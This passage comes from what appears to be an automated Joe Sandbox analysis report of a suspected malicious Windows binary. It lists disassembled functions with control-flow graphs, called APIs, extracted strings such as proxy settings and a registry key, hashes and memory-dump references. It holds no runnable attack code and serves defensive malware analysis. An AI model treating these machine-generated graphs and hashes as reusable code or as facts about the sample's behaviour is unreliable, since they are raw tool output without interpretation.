                                                                                          • Opcode Fuzzy Hash: a06d2ed8958997c0374ae3a399d304245e59f52859bf28516b7e7d3e144fa574
                                                                                          • Instruction Fuzzy Hash: A1B24A22A08BC5C5E7319B29E4413EAF3A1FB98784F445226DBCD13B59EF38E185C754
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C40BE4 Relevance: 23.3, APIs: 11, Strings: 2, Instructions: 562memoryencryptionCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 13543 7ff768c40be4-7ff768c40c23 memcpy 13544 7ff768c40c29-7ff768c40c57 call 7ff768bfb91a call 7ff768c04130 13543->13544 13545 7ff768c40ccc-7ff768c40cf6 13543->13545 13564 7ff768c40c59-7ff768c40c65 HeapFree 13544->13564 13565 7ff768c40c6b-7ff768c40c86 call 7ff768c3592d 13544->13565 13546 7ff768c40cfc-7ff768c40d07 13545->13546 13547 7ff768c412f3-7ff768c41305 call 7ff768bad0e0 13545->13547 13550 7ff768c40d0d-7ff768c40d18 13546->13550 13551 7ff768c42270 call 7ff768dbc4ed 13546->13551 13559 7ff768c4227a-7ff768c4227f 13547->13559 13560 7ff768c4130b-7ff768c4133c 13547->13560 13555 7ff768c40d1e-7ff768c40d70 call 7ff768c622d0 13550->13555 13556 7ff768c42281-7ff768c42283 13550->13556 13558 7ff768c42275 13551->13558 13573 7ff768c40d72-7ff768c40d8e 13555->13573 13574 7ff768c40d90-7ff768c40dba call 7ff768c622d0 13555->13574 13562 7ff768c42285-7ff768c42298 call 7ff768be358e 13556->13562 13558->13559 13566 7ff768c422c2-7ff768c422d0 call 7ff768db9d40 13559->13566 13560->13562 13567 7ff768c41342-7ff768c41354 call 7ff768bad0e0 13560->13567 13581 7ff768c4229a-7ff768c4229f 13562->13581 13564->13565 13583 7ff768c40c88-7ff768c40c8e 13565->13583 13584 7ff768c40ca4-7ff768c40caf 13565->13584 13567->13581 13587 7ff768c4135a-7ff768c41378 13567->13587 13580 7ff768c40dde-7ff768c40df0 13573->13580 13588 7ff768c40dbc-7ff768c40dbf 13574->13588 13589 7ff768c40dd3-7ff768c40dd8 13574->13589 13585 7ff768c41248 13580->13585 13586 7ff768c40df6-7ff768c40e7e 13580->13586 13581->13566 13590 7ff768c40c95-7ff768c40ca2 CertFreeCertificateContext 13583->13590 13591 7ff768c41a7f-7ff768c41a97 call 7ff768c3597a 13584->13591 13592 7ff768c40cb5-7ff768c40cc7 HeapFree 13584->13592 13594 7ff768c4124a-7ff768c4124d 13585->13594 13593 7ff768c40e86-7ff768c40ea6 call 7ff768be2275 13586->13593 13595 7ff768c4137a-7ff768c41386 13587->13595 13596 7ff768c4139c 13587->13596 13588->13589 13599 7ff768c40dc1-7ff768c40dcd HeapFree 13588->13599 13589->13580 13601 7ff768c41260-7ff768c4126a call 7ff768c42c75 13589->13601 13590->13584 13590->13590 13613 7ff768c41a99-7ff768c41a9b 13591->13613 13614 7ff768c41ab8-7ff768c41adb 13591->13614 13592->13591 13617 7ff768c40eca-7ff768c40ed2 13593->13617 13618 7ff768c40ea8-7ff768c40ec8 13593->13618 13603 7ff768c4126c-7ff768c412a9 call 7ff768c041f4 13594->13603 13604 7ff768c4124f-7ff768c4125e HeapFree 13594->13604 13597 7ff768c41388-7ff768c41392 call 7ff768c04415 13595->13597 13598 7ff768c41397-7ff768c4139a 13595->13598 13600 7ff768c413a3-7ff768c413b2 13596->13600 13597->13598 13598->13600 13599->13589 13609 7ff768c413b8-7ff768c413f3 call 7ff768bad0e0 13600->13609 13610 7ff768c41467-7ff768c41479 call 7ff768bad0e0 13600->13610 13601->13603 13622 7ff768c412ab-7ff768c412be call 7ff768c422f8 13603->13622 13623 7ff768c412c2-7ff768c412eb memcpy 13603->13623 13604->13603 13632 7ff768c413f9-7ff768c41444 call 7ff768bad0e0 13609->13632 13633 7ff768c422a8-7ff768c422ad 13609->13633 13636 7ff768c422a1-7ff768c422a6 13610->13636 13637 7ff768c4147f-7ff768c4153f 13610->13637 13613->13614 13621 7ff768c41a9d-7ff768c41aa1 13613->13621 13626 7ff768c40ed8-7ff768c40ef0 13617->13626 13627 7ff768c411c3-7ff768c41246 13617->13627 13625 7ff768c40f0e-7ff768c40f19 call 7ff768be4fb7 13618->13625 13621->13614 13630 7ff768c41aa3-7ff768c41ab3 call 7ff768c04415 13621->13630 13622->13623 13623->13547 13625->13627 13645 7ff768c40f1f-7ff768c40f6a 13625->13645 13634 7ff768c40efb-7ff768c40f06 13626->13634 13635 7ff768c40ef2-7ff768c40ef5 13626->13635 13627->13594 13630->13614 13632->13559 13655 7ff768c4144a-7ff768c41464 13632->13655 13633->13566 13634->13625 13635->13627 13635->13634 13636->13566 13638 7ff768c41587-7ff768c4158e 13637->13638 13639 7ff768c41541-7ff768c41551 13637->13639 13646 7ff768c415b0-7ff768c415b3 13638->13646 13647 7ff768c41590-7ff768c4159a 13638->13647 13644 7ff768c41553-7ff768c4155c 13639->13644 13649 7ff768c4155e-7ff768c4156b call 7ff768bf5460 13644->13649 13650 7ff768c41570-7ff768c41583 13644->13650 13651 7ff768c40f6c-7ff768c40f8d 13645->13651 13653 7ff768c415c7-7ff768c415ec 13646->13653 13654 7ff768c415b5-7ff768c415c1 HeapFree 13646->13654 13652 7ff768c415a1-7ff768c415ae CertFreeCertificateContext 13647->13652 13649->13650 13650->13644 13657 7ff768c41585 13650->13657 13660 7ff768c40fae-7ff768c40fca 13651->13660 13661 7ff768c40f8f-7ff768c40fa7 13651->13661 13652->13646 13652->13652 13653->13591 13654->13653 13655->13610 13657->13646 13663 7ff768c40fcc-7ff768c40fd1 13660->13663 13661->13651 13662 7ff768c40fa9-7ff768c40fac 13661->13662 13662->13663 13664 7ff768c40fd8-7ff768c40ff2 13663->13664 13666 7ff768c4100d-7ff768c41019 13664->13666 13667 7ff768c40ff4-7ff768c40ff9 13664->13667 13666->13664 13668 7ff768c4101b-7ff768c4101e 13666->13668 13669 7ff768c40ffb 13667->13669 13670 7ff768c40fff-7ff768c4100b HeapFree 13667->13670 13671 7ff768c410be-7ff768c410d3 call 7ff768c6b0a0 13668->13671 13672 7ff768c41024-7ff768c41034 13668->13672 13669->13670 13670->13666 13680 7ff768c4114c-7ff768c4115c 13671->13680 13681 7ff768c410d5-7ff768c41101 call 7ff768c49f27 memcpy 13671->13681 13672->13671 13673 7ff768c4103a-7ff768c41064 13672->13673 13675 7ff768c4107b-7ff768c410b9 13673->13675 13676 7ff768c41066-7ff768c41073 call 7ff768c42c9a 13673->13676 13679 7ff768c411b5-7ff768c411bd 13675->13679 13676->13675 13679->13593 13679->13627 13682 7ff768c4115e-7ff768c4116b call 7ff768c42c9a 13680->13682 13683 7ff768c41173-7ff768c411a7 13680->13683 13690 7ff768c41118-7ff768c4114a 13681->13690 13691 7ff768c41103-7ff768c41110 call 7ff768c51b93 13681->13691 13682->13683 13687 7ff768c411af-7ff768c411b2 13683->13687 13687->13679 13690->13687 13691->13690
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Free$Heap$memcpy$CertCertificateContext
                                                                                          • String ID: NO_PROXYno_proxy$invalid minimum TLS version for backendinvalid maximum TLS version for backendClient::new()
                                                                                          • API String ID: 3096728717-1978745097
                                                                                          • Opcode ID: 4aa72d4a946483a35a7465fbec0660ab90b32ee052b52726641c7e281363745d
                                                                                          • Instruction ID: a1c2ffb25b0d27858119312ab3ac98497d2780556dbd3f4bebfb6fb30d9aeb72
                                                                                          • Opcode Fuzzy Hash: 4aa72d4a946483a35a7465fbec0660ab90b32ee052b52726641c7e281363745d
                                                                                          • Instruction Fuzzy Hash: D8526872A0CBC1C5E661AB15E4403AAF7A1FB89B80F884136DACD43B99DF3CD599C714
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C643D0 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 383COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 13694 7ff768c643d0-7ff768c643fd call 7ff768c5db10 13696 7ff768c64402-7ff768c6440d 13694->13696 13697 7ff768c6446d-7ff768c64478 13696->13697 13698 7ff768c6440f-7ff768c6442c 13696->13698 13701 7ff768c64993-7ff768c649a6 13697->13701 13699 7ff768c6442e-7ff768c6443b 13698->13699 13700 7ff768c6447d-7ff768c64481 13698->13700 13704 7ff768c644f0-7ff768c64505 13699->13704 13705 7ff768c64441-7ff768c6444e 13699->13705 13702 7ff768c64497-7ff768c6449c 13700->13702 13703 7ff768c64483-7ff768c64487 13700->13703 13707 7ff768c644d1 13702->13707 13708 7ff768c6449e-7ff768c644a5 13702->13708 13706 7ff768c64489-7ff768c6448d 13703->13706 13703->13707 13704->13701 13705->13704 13709 7ff768c64454-7ff768c6445a 13705->13709 13710 7ff768c6450a-7ff768c64567 13706->13710 13711 7ff768c6448f-7ff768c64493 13706->13711 13715 7ff768c644d4-7ff768c644d8 13707->13715 13712 7ff768c644a7-7ff768c644ab 13708->13712 13713 7ff768c644c4-7ff768c644ca 13708->13713 13709->13710 13714 7ff768c64460-7ff768c64465 13709->13714 13717 7ff768c64569 13710->13717 13718 7ff768c64590-7ff768c645a0 13710->13718 13711->13710 13716 7ff768c64495 13711->13716 13719 7ff768c644ad-7ff768c644b3 13712->13719 13720 7ff768c644b5-7ff768c644bb 13712->13720 13713->13707 13721 7ff768c644cc-7ff768c644cf 13713->13721 13714->13707 13722 7ff768c64467-7ff768c6446b 13714->13722 13723 7ff768c644da-7ff768c644e0 13715->13723 13724 7ff768c644e2-7ff768c644e9 13715->13724 13716->13704 13726 7ff768c6457f-7ff768c6458c 13717->13726 13727 7ff768c645c9-7ff768c645f5 13718->13727 13728 7ff768c645a2-7ff768c645c2 call 7ff768dbdb10 13718->13728 13719->13707 13719->13720 13720->13715 13729 7ff768c644bd-7ff768c644c0 13720->13729 13721->13704 13721->13707 13722->13712 13723->13710 13723->13724 13724->13704 13725 7ff768c644eb-7ff768c644ee 13724->13725 13725->13704 13725->13710 13730 7ff768c645f8-7ff768c6461a SetLastError GetFullPathNameW 13726->13730 13727->13730 13728->13727 13729->13715 13732 7ff768c644c2 13729->13732 13734 7ff768c6461c-7ff768c64623 GetLastError 13730->13734 13735 7ff768c64629-7ff768c64636 13730->13735 13732->13704 13734->13735 13738 7ff768c646c5-7ff768c646de GetLastError 13734->13738 13736 7ff768c6463c-7ff768c64644 GetLastError 13735->13736 13737 7ff768c64570 13735->13737 13739 7ff768c649a7-7ff768c649bf call 7ff768dba1e0 13736->13739 13740 7ff768c6464a-7ff768c64663 13736->13740 13741 7ff768c6466e-7ff768c64671 13737->13741 13742 7ff768c64576-7ff768c6457d 13737->13742 13743 7ff768c64928-7ff768c64938 HeapFree 13738->13743 13744 7ff768c646e4 13738->13744 13762 7ff768c649e6-7ff768c64a43 call 7ff768bb02e0 * 2 13739->13762 13740->13726 13745 7ff768c64669 13740->13745 13746 7ff768c64677-7ff768c6468d 13741->13746 13747 7ff768c649c1-7ff768c649d3 call 7ff768dba1d0 13741->13747 13742->13718 13742->13726 13748 7ff768c6493e-7ff768c64941 13743->13748 13744->13748 13745->13718 13750 7ff768c646e9-7ff768c646f0 13746->13750 13751 7ff768c6468f-7ff768c646a4 13746->13751 13747->13762 13752 7ff768c64977-7ff768c64990 13748->13752 13753 7ff768c64943-7ff768c6495d 13748->13753 13760 7ff768c64777-7ff768c64782 13750->13760 13761 7ff768c646f6 13750->13761 13757 7ff768c646fb-7ff768c646ff 13751->13757 13758 7ff768c646a6-7ff768c646b2 13751->13758 13752->13701 13753->13701 13759 7ff768c6495f-7ff768c64975 HeapFree 13753->13759 13757->13760 13767 7ff768c64701-7ff768c64713 13757->13767 13758->13757 13763 7ff768c646b4-7ff768c646c0 13758->13763 13759->13701 13765 7ff768c647a8 13760->13765 13766 7ff768c64784 13760->13766 13761->13765 13768 7ff768c647b1-7ff768c647bb 13763->13768 13771 7ff768c647af 13765->13771 13770 7ff768c64788-7ff768c6478c 13766->13770 13767->13771 13772 7ff768c64719-7ff768c6471c 13767->13772 13775 7ff768c647bd-7ff768c647c4 13768->13775 13776 7ff768c64834-7ff768c64837 13768->13776 13770->13765 13774 7ff768c6478e-7ff768c647a6 13770->13774 13771->13768 13777 7ff768c6471e-7ff768c64721 13772->13777 13778 7ff768c6473a-7ff768c64746 13772->13778 13774->13768 13779 7ff768c647c6-7ff768c647e3 13775->13779 13780 7ff768c647e5 13775->13780 13783 7ff768c64839-7ff768c6485f call 7ff768dbdb10 13776->13783 13784 7ff768c64861-7ff768c64867 13776->13784 13777->13770 13781 7ff768c64723-7ff768c64731 13777->13781 13778->13760 13782 7ff768c64748-7ff768c64754 13778->13782 13786 7ff768c647f0-7ff768c64818 call 7ff768c5bcf0 13779->13786 13780->13786 13787 7ff768c64758-7ff768c64764 13781->13787 13788 7ff768c64733-7ff768c64736 13781->13788 13782->13760 13789 7ff768c64756 13782->13789 13791 7ff768c6487d-7ff768c648a0 memcpy 13783->13791 13784->13791 13803 7ff768c6481a-7ff768c6482e 13786->13803 13804 7ff768c64869-7ff768c6487a 13786->13804 13787->13760 13794 7ff768c64766-7ff768c64772 13787->13794 13788->13782 13792 7ff768c64738 13788->13792 13789->13771 13796 7ff768c648c9-7ff768c648ea memcpy 13791->13796 13797 7ff768c648a2-7ff768c648c2 call 7ff768dbdb10 13791->13797 13792->13760 13794->13763 13798 7ff768c648ec-7ff768c64902 call 7ff768c5deb0 13796->13798 13799 7ff768c64909-7ff768c64926 13796->13799 13797->13796 13798->13799 13799->13743 13799->13748 13803->13776 13807 7ff768c649d5-7ff768c649d8 13803->13807 13804->13791 13808 7ff768c649da-7ff768c649df call 7ff768bb0250 13807->13808 13809 7ff768c649e1 call 7ff768db9d40 13807->13809 13808->13762 13809->13762
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$FreeFullHeapNamePath
                                                                                          • String ID: \\?\\\?\UNC\$failed to write whole buffer
                                                                                          • API String ID: 526175943-2259764440
                                                                                          • Opcode ID: e547a2f1d518f63a6e6a9bf2f1ceeec1c634f82c6812b6d53f2f92c7193d91f0
                                                                                          • Instruction ID: 920e3b9ebf753bbecb6303cc0f29bc19c458e94fdcaecdae3d18917a49dab8c7
                                                                                          • Opcode Fuzzy Hash: e547a2f1d518f63a6e6a9bf2f1ceeec1c634f82c6812b6d53f2f92c7193d91f0
                                                                                          • Instruction Fuzzy Hash: 390272A2A046C1C4EB71AF2198543F8F3A4FF44B98F844576DA5D6B684DF38E6C5C328
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C42C9A Relevance: 19.1, APIs: 11, Strings: 1, Instructions: 1136memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          • HTTP_PROXYhttp_proxyHTTPS_PROXYhttps_proxyREQUEST_METHODSoftware\Microsoft\Windows\CurrentVersion\Internet SettingsProxyEnableProxyServer=, xrefs: 00007FF768C42F33
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap$QueryValuememcpy
                                                                                          • String ID: HTTP_PROXYhttp_proxyHTTPS_PROXYhttps_proxyREQUEST_METHODSoftware\Microsoft\Windows\CurrentVersion\Internet SettingsProxyEnableProxyServer=
                                                                                          • API String ID: 1578172409-3997717788
                                                                                          • Opcode ID: 75cbc7bc3936fc69e5a15ee00818fb1ad74c2d7a267d3676df38b921fcd68dec
                                                                                          • Instruction ID: 78b7c1cb96e43f8e738fa5eebf8d49ccc1178b95d199566f8f132a0d11a99dba
                                                                                          • Opcode Fuzzy Hash: 75cbc7bc3936fc69e5a15ee00818fb1ad74c2d7a267d3676df38b921fcd68dec
                                                                                          • Instruction Fuzzy Hash: 44B29472A0CAC1C5EA70AB25E4443EAE7A1FF88784F984175DA8D07B99DF7CD089C714
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768B71173 Relevance: 17.3, APIs: 11, Instructions: 765COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 14338 7ff768b71173-7ff768b7119d 14339 7ff768b711a0-7ff768b711c4 call 7ff768bd19d3 14338->14339 14341 7ff768b711ca-7ff768b711ef 14339->14341 14342 7ff768b71e83-7ff768b71e9d call 7ff768dbc97c 14339->14342 14343 7ff768b712eb-7ff768b712f3 14341->14343 14344 7ff768b711f5-7ff768b71210 14341->14344 14355 7ff768b71eaa-7ff768b71ef6 14342->14355 14346 7ff768b712fb-7ff768b71407 call 7ff768c937aa SafeArrayDestroy call 7ff768bdd324 14343->14346 14347 7ff768b71218-7ff768b7121e 14344->14347 14368 7ff768b71dbd-7ff768b71de3 14346->14368 14369 7ff768b7140d-7ff768b71443 14346->14369 14350 7ff768b7127f-7ff768b71287 14347->14350 14351 7ff768b71220-7ff768b7123f 14347->14351 14350->14346 14353 7ff768b724d9-7ff768b724f4 call 7ff768dba1e0 14351->14353 14354 7ff768b71245-7ff768b7127a 14351->14354 14354->14347 14356 7ff768b7127c 14354->14356 14357 7ff768b71f30-7ff768b71f43 14355->14357 14356->14350 14360 7ff768b721bf-7ff768b72273 14357->14360 14364 7ff768b72276-7ff768b722b7 14360->14364 14366 7ff768b722b9-7ff768b722ca HeapFree 14364->14366 14367 7ff768b722d0-7ff768b722f2 call 7ff768b777f0 14364->14367 14366->14367 14374 7ff768b722fa-7ff768b7230e call 7ff768bf44d3 14367->14374 14371 7ff768b71e60-7ff768b71e7e 14368->14371 14372 7ff768b7144b-7ff768b714cb call 7ff768befd87 memcpy call 7ff768c959dc 14369->14372 14371->14374 14372->14355 14383 7ff768b714d1-7ff768b7152f 14372->14383 14380 7ff768b72322-7ff768b72357 14374->14380 14381 7ff768b72310-7ff768b7231c HeapFree 14374->14381 14386 7ff768b7235d 14380->14386 14387 7ff768b71d72 14380->14387 14381->14380 14388 7ff768b71ef8-7ff768b71f28 SysFreeString 14383->14388 14389 7ff768b71535-7ff768b7155f 14383->14389 14390 7ff768b71d74-7ff768b71db8 14386->14390 14387->14390 14388->14357 14391 7ff768b71561-7ff768b7156b 14389->14391 14392 7ff768b715af-7ff768b715d2 call 7ff768c95d98 14389->14392 14404 7ff768b710ae-7ff768b710c9 14390->14404 14394 7ff768b723d7-7ff768b723df 14391->14394 14395 7ff768b71571-7ff768b7159d 14391->14395 14402 7ff768b715d8-7ff768b71810 call 7ff768c93808 14392->14402 14403 7ff768b72083-7ff768b72107 14392->14403 14399 7ff768b7210c-7ff768b7218c 14394->14399 14395->14392 14401 7ff768b7218f-7ff768b721bb SysFreeString 14399->14401 14401->14360 14410 7ff768b71f48-7ff768b71fa5 14402->14410 14411 7ff768b71816-7ff768b71865 VariantClear 14402->14411 14403->14399 14407 7ff768b710d4-7ff768b7110e call 7ff768b78608 14404->14407 14420 7ff768b71113-7ff768b7113a 14407->14420 14410->14401 14414 7ff768b7186b-7ff768b718cf SysFreeString call 7ff768b7f388 14411->14414 14415 7ff768b71faa-7ff768b72016 call 7ff768b78802 SysFreeString 14411->14415 14422 7ff768b7201b-7ff768b7207e 14414->14422 14423 7ff768b718d5-7ff768b7191b 14414->14423 14415->14360 14426 7ff768b71140-7ff768b7116d call 7ff768c95d98 14420->14426 14422->14364 14424 7ff768b71de5-7ff768b71e58 14423->14424 14425 7ff768b71921-7ff768b719bb call 7ff768c27aa3 14423->14425 14424->14371 14431 7ff768b719c3-7ff768b719d0 14425->14431 14426->14338 14433 7ff768b719d5-7ff768b719d9 14431->14433 14434 7ff768b719db-7ff768b71a00 14433->14434 14435 7ff768b71a1f-7ff768b71a2a 14433->14435 14434->14433 14436 7ff768b71a02-7ff768b71a1b memcmp 14434->14436 14437 7ff768b71b10-7ff768b71b23 14435->14437 14438 7ff768b71a30-7ff768b71a46 14435->14438 14436->14433 14441 7ff768b71a1d-7ff768b71aaa 14436->14441 14439 7ff768b71b25 14437->14439 14440 7ff768b71b41-7ff768b71b5a 14437->14440 14438->14431 14442 7ff768b71b2a-7ff768b71b3f 14439->14442 14443 7ff768b71b5c-7ff768b71b6b 14440->14443 14444 7ff768b71b6f-7ff768b71b8c 14440->14444 14448 7ff768b71aac-7ff768b71abd HeapFree 14441->14448 14449 7ff768b71ac3-7ff768b71af3 14441->14449 14442->14440 14442->14442 14443->14444 14446 7ff768b71b8e-7ff768b71b91 14444->14446 14447 7ff768b71b97-7ff768b71c46 14444->14447 14446->14447 14452 7ff768b71c5f-7ff768b71c6f call 7ff768db9a34 14446->14452 14447->14452 14448->14449 14450 7ff768b71afd-7ff768b71b05 14449->14450 14451 7ff768b71af5-7ff768b71af8 call 7ff768b78802 14449->14451 14450->14372 14454 7ff768b71b0b 14450->14454 14451->14450 14456 7ff768b71c74-7ff768b71c92 14452->14456 14454->14424 14457 7ff768b71c94 14456->14457 14458 7ff768b71cb0-7ff768b71cc1 14456->14458 14459 7ff768b71c99-7ff768b71cae 14457->14459 14458->14447 14460 7ff768b71cc7-7ff768b71cd6 14458->14460 14459->14458 14459->14459 14460->14447
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafememcpy
                                                                                          • String ID:
                                                                                          • API String ID: 189305449-0
                                                                                          • Opcode ID: d13f21e175607842f5ed283d6ed19d2a83405334618ea002916854cece00b2f5
                                                                                          • Instruction ID: 47f0de73c2fa59b90a9905f001699a71243b6e4e4f628d5a371eae2891a7038a
                                                                                          • Opcode Fuzzy Hash: d13f21e175607842f5ed283d6ed19d2a83405334618ea002916854cece00b2f5
                                                                                          • Instruction Fuzzy Hash: 15820336608BC1C5E6719B2AA4503EAF7A4FB88B80F844126DBCD53B59EF3CD145CB24
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768B82099 Relevance: 16.9, APIs: 7, Strings: 4, Instructions: 359memoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 14461 7ff768b82099-7ff768b820a4 call 7ff768c6b6d0 14464 7ff768b820aa-7ff768b820b5 call 7ff768c7c890 14461->14464 14465 7ff768b82754-7ff768b82762 14461->14465 14470 7ff768b820bb-7ff768b82201 call 7ff768bb09e0 call 7ff768bb0dd0 call 7ff768b7def6 call 7ff768bb09e0 14464->14470 14471 7ff768b82764-7ff768b8276b 14464->14471 14467 7ff768b82772-7ff768b8277c call 7ff768dba1e0 14465->14467 14474 7ff768b8277e-7ff768b827aa call 7ff768dba540 14467->14474 14487 7ff768b8221a-7ff768b82223 14470->14487 14488 7ff768b82203-7ff768b82214 HeapFree 14470->14488 14471->14467 14479 7ff768b827ac-7ff768b827bb call 7ff768db9d40 14474->14479 14489 7ff768b8223c-7ff768b82284 call 7ff768b755ab 14487->14489 14490 7ff768b82225-7ff768b82236 HeapFree 14487->14490 14488->14487 14493 7ff768b822c6-7ff768b8230a call 7ff768b80969 14489->14493 14494 7ff768b82286-7ff768b822a9 call 7ff768b7875f 14489->14494 14490->14489 14501 7ff768b8230c-7ff768b82360 14493->14501 14502 7ff768b82365-7ff768b82404 memcpy * 2 call 7ff768b7d257 14493->14502 14499 7ff768b826f4-7ff768b826fd 14494->14499 14500 7ff768b822af-7ff768b822c1 HeapFree 14494->14500 14503 7ff768b82716-7ff768b8271a 14499->14503 14504 7ff768b826ff-7ff768b82710 HeapFree 14499->14504 14500->14499 14501->14499 14510 7ff768b8240b-7ff768b82425 14502->14510 14507 7ff768b8271c-7ff768b82729 HeapFree 14503->14507 14508 7ff768b8272f-7ff768b82743 14503->14508 14504->14503 14507->14508 14510->14510 14511 7ff768b82427-7ff768b8245e 14510->14511 14511->14474 14512 7ff768b82464-7ff768b824c8 call 7ff768c4a05e 14511->14512 14515 7ff768b824ca-7ff768b8251a call 7ff768d048a8 14512->14515 14516 7ff768b82532-7ff768b8255a 14512->14516 14521 7ff768b8251c-7ff768b8252d 14515->14521 14522 7ff768b8255f-7ff768b82587 call 7ff768b73bce 14515->14522 14518 7ff768b826e7-7ff768b826ef call 7ff768b780c1 14516->14518 14518->14499 14523 7ff768b826da-7ff768b826e2 call 7ff768b78ad9 14521->14523 14527 7ff768b8258d-7ff768b8259f call 7ff768bad0e0 14522->14527 14528 7ff768b826a7-7ff768b826b7 14522->14528 14523->14518 14527->14479 14535 7ff768b825a5-7ff768b82606 14527->14535 14530 7ff768b826b9-7ff768b826bd call 7ff768d050d4 14528->14530 14531 7ff768b826c2-7ff768b826c4 14528->14531 14530->14531 14532 7ff768b826c6-7ff768b826d7 14531->14532 14532->14523 14536 7ff768b8260b-7ff768b8261f call 7ff768b73bce 14535->14536 14539 7ff768b8268a-7ff768b82692 14536->14539 14540 7ff768b82621-7ff768b82629 14536->14540 14543 7ff768b8269d-7ff768b826a5 14539->14543 14544 7ff768b82694-7ff768b82698 call 7ff768d050d4 14539->14544 14541 7ff768b8262b-7ff768b8266d 14540->14541 14542 7ff768b8266f-7ff768b82688 call 7ff768db9099 14540->14542 14541->14536 14542->14541 14543->14532 14544->14543
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap$memcpy
                                                                                          • String ID: _$already borrowed$called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value$roa sequence
                                                                                          • API String ID: 1887603139-386922787
                                                                                          • Opcode ID: 98742759fcaf2ca1b966d418caaf78190908407d66327c2c790d65e6ccc64bba
